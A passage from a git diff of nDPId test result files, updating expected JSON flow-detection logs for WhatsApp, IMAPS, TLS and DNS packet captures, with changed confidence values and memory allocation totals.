{"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":675,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":86,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655116940904,"flow_last_seen":1655116941004,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":278,"flow_tot_l4_payload_len":282,"flow_avg_l4_payload_len":70,"midstream":0,"thread_ts_msec":1655116941004,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":40006,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":679,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":84,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655114622076,"flow_last_seen":1655114622275,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1258,"flow_tot_l4_payload_len":1273,"flow_avg_l4_payload_len":159,"midstream":0,"thread_ts_msec":1655116941291,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.33","src_port":47284,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":679,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":85,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655116217773,"flow_last_seen":1655116218131,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":331,"flow_tot_l4_payload_len":616,"flow_avg_l4_payload_len":77,"midstream":0,"thread_ts_msec":1655116941291,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":39334,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":679,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655108977493,"flow_last_seen":1655108978075,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":290,"flow_tot_l4_payload_len":334,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1655116941291,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":37404,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":679,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655109656108,"flow_last_seen":1655109656661,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":279,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1655116941291,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":47776,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":679,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1655111789393,"flow_last_seen":1655111789765,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":279,"flow_tot_l4_payload_len":323,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1655116941291,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":47810,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":679,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655111268965,"flow_last_seen":1655111269503,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":273,"flow_tot_l4_payload_len":317,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1655116941291,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":37674,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":679,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655110961423,"flow_last_seen":1655110962551,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":276,"flow_tot_l4_payload_len":294,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1655116941291,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":37766,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":679,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":81,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655111980061,"flow_last_seen":1655111980926,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":276,"flow_tot_l4_payload_len":294,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1655116941291,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":37822,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":679,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":86,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655116940904,"flow_last_seen":1655116941291,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":278,"flow_tot_l4_payload_len":322,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1655116941291,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":40006,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":679,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":80,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655111826253,"flow_last_seen":1655111826511,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1258,"flow_tot_l4_payload_len":1273,"flow_avg_l4_payload_len":159,"midstream":0,"thread_ts_msec":1655116941291,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.33","src_port":46394,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":679,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":83,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655113084330,"flow_last_seen":1655113084909,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":279,"flow_tot_l4_payload_len":297,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1655116941291,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":38234,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":679,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":82,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655111980926,"flow_last_seen":1655111980926,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1258,"flow_tot_l4_payload_len":1273,"flow_avg_l4_payload_len":159,"midstream":0,"thread_ts_msec":1655116941291,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.33","src_port":46576,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 00565{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":679,"source":"whatsapp.pcap","alias":"nDPId-test","packets-captured":679,"packets-processed":679,"total-skipped-flows":0,"total-l4-payload-len":50635,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":86,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":86,"total-idle-flows":86,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":579,"global_ts_msec":1655116941291} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 679/679 @@ -585,9 +585,9 @@ ~~ total active/idle flows...: 86/86 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 6155362 bytes -~~ total memory freed........: 6155362 bytes -~~ total allocations/frees...: 119219/119219 +~~ total memory allocated....: 6288996 bytes +~~ total memory freed........: 6288996 bytes +~~ total allocations/frees...: 121981/121981 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 464 chars ~~ json string max len.......: 693 chars diff --git a/test/results/whatsapp_login_call.pcap.out b/test/results/whatsapp_login_call.pcap.out index 78dffb897..76b7abb3b 100644 --- a/test/results/whatsapp_login_call.pcap.out +++ b/test/results/whatsapp_login_call.pcap.out @@ -3,7 +3,7 @@ 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582222253,"flow_last_seen":1432582222253,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582222253,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.172.100.70","src_port":49199,"dst_port":993,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1432582222253,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1432582222253,"pkt":"xiwDYGpkAPS5Jrv0CABFAAA0DNdAAEAG9U7AqAIEEaxkRsAvA+GIPSCcUlOPyIAQH\/poTQAAAQEICi36Gt0QlQ1l"} 00711{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1432582222267,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":236,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":236,"pkt_l4_len":202,"thread_ts_msec":1432582222267,"pkt":"xiwDYGpkAPS5Jrv0CABFAADeU1tAAEAGriDAqAIEEaxkRsAvA+GIPSCcUlOPyIAYIAB\/kgAAAQEICi36GusQlQ1lFwMBACCNqYpymgjJuQNgLA+QJekfsmHWqykdlwnJ8t48lRIpCxcDAQCAv+6eyOO6KHhFdGRnKCRyPqihrwnYLrpV5EXpUrXv8Q2ow7fiZ\/ErfHE9ZAprbeZEb1cjDczzZ9GWtg7wUDK1rjYT+gKbhCMZiNQZ3QlWly2tQPPw5M7rqWdzOWy2ATMXqxCkXOBCTdOBYD70ikDCSIjo2fZ8\/cJDhiGvSnc\/9Rw="} -00643{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1432582222253,"flow_last_seen":1432582222267,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":170,"flow_tot_l4_payload_len":170,"flow_avg_l4_payload_len":85,"midstream":1,"thread_ts_msec":1432582222267,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.172.100.70","src_port":49199,"dst_port":993,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"IMAPS","breed":"Safe","category":"Email"}} +00643{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1432582222253,"flow_last_seen":1432582222267,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":170,"flow_tot_l4_payload_len":170,"flow_avg_l4_payload_len":85,"midstream":1,"thread_ts_msec":1432582222267,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.172.100.70","src_port":49199,"dst_port":993,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"IMAPS","breed":"Safe","category":"Email"}} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1432582222410,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1432582222410,"pkt":"APS5Jrv0xiwDYGpkCABFAAA0e5UAAC8G15ARrGRGwKgCBAPhwC9SU4\/IiD0hRoAQAJuGIAAAAQEIChCVDjkt+hrr"} 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":15,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582223075,"flow_last_seen":1432582223075,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582223075,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.154.66.121","src_port":49166,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":15,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1432582223075,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432582223075,"pkt":"xiwDYGpkAPS5Jrv0CABFAAAoimtAAEAGmaXAqAIEEZpCecAOAbvaSAv6foHOKFARQABkXQAA"} @@ -24,7 +24,7 @@ 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":28,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1432582224238,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1432582224238,"pkt":"APS5Jrv0xiwDYGpkCABFAAA0pWwAADkGNJ9duodSwKgCBABQwBXhXSkWroZu\/IARAeZAKgAAAQEIClj4+ywt+iJ3"} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":29,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1432582224240,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1432582224240,"pkt":"xiwDYGpkAPS5Jrv0CABFAAA06DdAAEAGqtPAqAIEXbqHUsAVAFCuhm784V0pF4AQIEUhrwAAAQEICi36IpNY+Pss"} 00596{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":30,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1432582224258,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":151,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":151,"pkt_l4_len":117,"thread_ts_msec":1432582224258,"pkt":"APS5Jrv0xiwDYGpkCABFAACJJDcAADkG7nUXMpTkwKgCBAG7wBTRmfKoS8+iLoAYAghwjQAAAQEIChFecist+iKKFQMDAFAv7dNuXnOpK1CdvNYEt52MdeH58dywqIMfN+GfFSQKoHdGcEPHPIYnDd6I8bRCtU0lSoikjPCdTCArNmgRywMWXqpqGQcfgITTy3erXmajWw=="} -00638{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":30,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1432582224230,"flow_last_seen":1432582224258,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":85,"flow_tot_l4_payload_len":85,"flow_avg_l4_payload_len":42,"midstream":1,"thread_ts_msec":1432582224258,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"23.50.148.228","src_port":49172,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00638{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":30,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1432582224230,"flow_last_seen":1432582224258,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":85,"flow_tot_l4_payload_len":85,"flow_avg_l4_payload_len":42,"midstream":1,"thread_ts_msec":1432582224258,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"23.50.148.228","src_port":49172,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":31,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1432582224259,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1432582224259,"pkt":"APS5Jrv0xiwDYGpkCABFAAA0JDgAADkG7skXMpTkwKgCBAG7wBTRmfL9S8+iLoARAgi9fgAAAQEIChFecist+iKK"} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":34,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1432582224263,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1432582224263,"pkt":"APS5Jrv0xiwDYGpkCABFAAA0UnIAADkGPNoFsioawKgCBABQwBZ503WfeS7N5oARAeY3ugAAAQEICmSSnpkt+iKP"} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":35,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1432582224264,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1432582224264,"pkt":"xiwDYGpkAPS5Jrv0CABFAAA0QQVAAEAGB0fAqAIEBbIqGsAWAFB5Ls3medN1oIAQIFAZNgAAAQEICi36Iqlkkp6Z"} @@ -44,16 +44,16 @@ 00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":46,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":3,"flow_last_seen":1432582225533,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432582225533,"pkt":"xiwDYGpkAPS5Jrv0CABFAAAooItAAEAGYbXAqAIEEaxkN8ANAbtmBk0CJP5uKFAQ\/\/9vTQAA"} 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":47,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582227526,"flow_last_seen":1432582227526,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1432582227526,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"192.168.2.1","src_port":51897,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":47,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1432582227526,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":79,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":79,"pkt_l4_len":45,"thread_ts_msec":1432582227526,"pkt":"xiwDYGpkAPS5Jrv0CABFAABBdxsAAEARfjvAqAIEwKgCAcq5ADUALb4mNPgBAAABAAAAAAAABXF1ZXJ5A2VzcwVhcHBsZQNjb20AAAEAAQ=="} -00777{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":47,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582227526,"flow_last_seen":1432582227526,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1432582227526,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"192.168.2.1","src_port":51897,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"Web"},"dns": {"query":"query.ess.apple.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00777{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":47,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582227526,"flow_last_seen":1432582227526,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1432582227526,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"192.168.2.1","src_port":51897,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"Web"},"dns": {"query":"query.ess.apple.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00728{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":48,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":1432582227594,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":251,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":251,"pkt_l4_len":217,"thread_ts_msec":1432582227594,"pkt":"APS5Jrv0xiwDYGpkCABFAADtqMoAAEARS+DAqAIBwKgCBAA1yrkA2SFYNPiBgAABAAkAAAAABXF1ZXJ5A2VzcwVhcHBsZQNjb20AAAEAAcAMAAUAAQAASFYAIAVxdWVyeQllc3MtYXBwbGUDY29tBmFrYWRucwNuZXQAwDEAAQABAAAAOwAEEbJoDMAxAAEAAQAAADsABBGyaA7AMQABAAEAAAA7AAQRsmgnwDEAAQABAAAAOwAEEbJoJsAxAAEAAQAAADsABBGyaA3AMQABAAEAAAA7AAQRsmgPwDEAAQABAAAAOwAEEbJoC8AxAAEAAQAAADsABBGyaBA="} -00794{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":48,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1432582227526,"flow_last_seen":1432582227594,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":209,"flow_tot_l4_payload_len":246,"flow_avg_l4_payload_len":123,"midstream":0,"thread_ts_msec":1432582227594,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"192.168.2.1","src_port":51897,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"Web"},"dns": {"query":"query.ess.apple.com","num_queries":1,"num_answers":9,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"17.178.104.12"}} +00794{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":48,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1432582227526,"flow_last_seen":1432582227594,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":209,"flow_tot_l4_payload_len":246,"flow_avg_l4_payload_len":123,"midstream":0,"thread_ts_msec":1432582227594,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"192.168.2.1","src_port":51897,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"Web"},"dns": {"query":"query.ess.apple.com","num_queries":1,"num_answers":9,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"17.178.104.12"}} 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":49,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582227595,"flow_last_seen":1432582227595,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1432582227595,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"192.168.2.1","src_port":52190,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":49,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1432582227595,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"thread_ts_msec":1432582227595,"pkt":"xiwDYGpkAPS5Jrv0CABFAAA+I5EAAEAR0cjAqAIEwKgCAcveADUAKv\/L36MBAAABAAAAAAAAA2UxMwh3aGF0c2FwcANuZXQAAAEAAQ=="} 